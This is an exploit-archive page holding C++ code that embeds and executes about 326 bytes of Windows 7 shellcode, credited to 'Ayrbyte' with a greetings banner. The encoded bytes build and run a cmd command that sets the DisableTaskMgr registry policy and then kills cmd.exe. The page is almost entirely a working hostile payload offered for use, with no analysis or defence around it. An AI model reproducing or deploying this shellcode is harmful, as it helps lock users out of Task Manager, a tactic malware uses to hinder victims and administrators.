Windows7 Disable Task Manager Shellcode - 326 chars



EKU-ID: 3168 CVE: OSVDB-ID:
Author: Ayrbyte Published: 2013-04-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


/*------------------------------------------------
==[ By Ayrbyte ]======[ Geng Simbe @ TKJ 1 Club ]========================================
Greets To : Adit Groundd SAndd Notte, Agos Wahyo, Aguenkk Rebel Black Sweet,
Ahmad Bagoes, Alvin Putra Marcdyto, Arieb Shezhaniea, Aviep Autiez, Chusnie Mubarok,
Cumigh Gokil On Üç, Dapat Di Hubungi, De Ayiph Ever, Dwi J Andreansyah, Jack PYing,
Khuluq Gomez, Ola Amor Arpaz, Pewe, Q-blueshiierezpector Screamoalltheway Aparatkeparat, 
Raden Mas Koko, Rivan Ardiansyah, Rizqi Bogez, Rony C'Penghianat X Ciinta, Sukrex Dreizehn, 
Syafi'i, and all Tkj 1 Club Family... ^_^
=========================================================================================
--------------------------------------------------
    title : Windows7 Disable Task Manager Shellcode - 326 chars
    Author: Ayrbyte
    Category: local
    Tested on: Windows7 Ultimate
    Code : c++
    Fb : fb.me/Ayrbyte 
------------------------------------------------ */
#include <iostream>
using namespace std;

char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x52\x89\x4A\x04\xB9\x45\x47\x20\x61\x89\x4A\x08\xB9\x64\x64\x20\x48\x89\x4A\x0C\xB9\x4B"
"\x43\x55\x5C\x89\x4A\x10\xB9\x53\x6F\x66\x74\x89\x4A\x14\xB9\x77\x61\x72\x65\x89\x4A\x18\xB9\x5C\x4D\x69\x63\x89\x4A\x1C\xB9\x72"
"\x6F\x73\x6F\x89\x4A\x20\xB9\x66\x74\x5C\x57\x89\x4A\x24\xB9\x69\x6E\x64\x6F\x89\x4A\x28\xB9\x77\x73\x5C\x43\x89\x4A\x2C\xB9\x75"
"\x72\x72\x65\x89\x4A\x30\xB9\x6E\x74\x56\x65\x89\x4A\x34\xB9\x72\x73\x69\x6F\x89\x4A\x38\xB9\x6E\x5C\x50\x6F\x89\x4A\x3C\xB9\x6C"
"\x69\x63\x69\x89\x4A\x40\xB9\x65\x73\x5C\x53\x89\x4A\x44\xB9\x79\x73\x74\x65\x89\x4A\x48\xB9\x6D\x20\x2F\x76\x89\x4A\x4C\xB9\x20"
"\x44\x69\x73\x89\x4A\x50\xB9\x61\x62\x6C\x65\x89\x4A\x54\xB9\x54\x61\x73\x6B\x89\x4A\x58\xB9\x4D\x67\x72\x20\x89\x4A\x5C\xB9\x2F"
"\x74\x20\x52\x89\x4A\x60\xB9\x45\x47\x5F\x44\x89\x4A\x64\xB9\x57\x4F\x52\x44\x89\x4A\x68\xB9\x20\x2F\x64\x20\x89\x4A\x6C\xB9\x31"
"\x20\x2F\x66\x89\x4A\x70\xB9\x20\x26\x20\x74\x89\x4A\x74\xB9\x61\x73\x6B\x6B\x89\x4A\x78\xB9\x69\x6C\x6C\x20\x89\x4A\x7C\xB9\x2F"
"\x69\x6D\x20\x89\x8A\x80\x00\x00\x00\xB9\x63\x6D\x64\x2E\x89\x8A\x84\x00\x00\x00\xB9\x65\x78\x65\x20\x89\x8A\x88\x00\x00\x00\xB9"
"\x40\x77\x11\x11\x2B\xC8\x89\x8A\x8C\x00\x00\x00\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51\x8D\x4E\xBC\x51\x53"
"\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33\xDB"
"\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB8\x11\x11\x11\x11"
"\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";

int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
    int (*_13)() = (int(*)())code; _13(); }
/*=================[ Geng Simbe @ TKJ 1 Club ]======*/